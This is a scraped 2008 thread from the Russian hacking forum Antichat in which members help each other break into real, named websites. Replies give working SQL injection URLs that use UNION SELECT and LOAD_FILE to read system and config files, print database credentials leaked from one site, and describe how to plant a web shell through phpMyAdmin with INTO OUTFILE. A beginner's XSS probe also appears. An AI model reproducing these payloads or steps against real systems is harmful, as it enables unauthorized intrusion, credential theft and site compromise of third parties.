Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

30.10.2008, 11:13
|
|
Познающий
Регистрация: 31.05.2008
Сообщений: 58
Провел на форуме: 584504
Репутация:
27
|
|
Спасибо ребятки!!!
|
|
|

31.10.2008, 17:53
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 4
Провел на форуме: 9016
Репутация:
0
|
|
Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
|
|
|

31.10.2008, 18:15
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме: 7229141
Репутация:
3099
|
|
Сообщение от Demonboy
Помогите пожалуйста найти админку сайта http://www.mediaport.info а то я искал искал и нашел только директорию /admin/
и то выдает ошибку  ну раз нашел скуль (а она там есть+ раскрытие пути) может другие варианты рассмотришь? 
|
|
|

01.11.2008, 15:54
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 4
Провел на форуме: 9016
Репутация:
0
|
|
Какие например можеш что то посоветовать? А то я только начинающий....
|
|
|

01.11.2008, 23:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме: 3008839
Репутация:
1502
|
|
короче глянул на твой сайтик...
http://www.mediaport.info/production.php?theme=-1'%20union%20select%201,2,3,4,5,LOAD_FILE('/'),7,8,9%20from%20mysql.user%20limit%200,1/*
тебя наверное порадует...
PS Если б не был таким ленивым, то сам бы покоырялся и тебе ничего не сказал :d
//пасс мускулистого рута брутится
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|

02.11.2008, 02:16
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 4
Провел на форуме: 9016
Репутация:
0
|
|
Пасиб большое мне ещё учиться и учиться сам бы до такого не дошел бы))
|
|
|

02.11.2008, 15:01
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме: 3395070
Репутация:
173
|
|
http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2F6574632F7 06173737764),6,7,8,9,10,11+from+users/*
version():5.1.22-rc-log
- можно ли както здесь залить шелл?
- имея доступ на чтение файлов как можно узнать полный путь до www?
- при использованиии конструкции into outfile можно ли кодировать путь к файлу в хекс?
|
|
|

02.11.2008, 15:27
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме: 13395217
Репутация:
2097
|
|
1)Там есть phpmyadmin через него можно залить шелл
читаем конфиг:
Код:
http://www.bis-el.kiev.ua/index.php?parent_id=0&part_id=1&article_id=-99999+union+select+1,2,3,4,load_file(0x2f686f6d652f6b696e672f7075626c69635f68746d6c2f696e632f64625f6d7973716c2e696e63),6,7,8,9,10,11+from+mysql.user/*
оттуда получаем логин/пароль к БД
var $User = "clever";
var $Password = "whitebear";
Идем в phpmyadmin
http://www.bis-el.kiev.ua/phpmyadm/
и льем шелл через into outfile
Путь: /home/king/public_html/
2)Путь там можно подобрать, т.к там фряха, а в ней через load_file можно читать содержимое дир
3)Путь к файлу в hex кодировать нельзя
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
Последний раз редактировалось l-l00K; 02.11.2008 в 15:36..
|
|
|

02.11.2008, 21:12
|
|
студент
Регистрация: 30.07.2007
Сообщений: 800
Провел на форуме: 4275992
Репутация:
1188
|
|
сильно не пинайте если что не так) просто я только пробую искать xss
при поисковом запросе фразы "><script>alert()</script> на одном сайте имеем следующую ошибку:
на белом фоне красуется надпись
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
... почему спросил, просто много прошарил сайтов и только на этом впервые такая трабла.)
|
|
|

02.11.2008, 21:14
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
Это IIS сервер скорее всего, он ругается на все неугодные ему символы
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|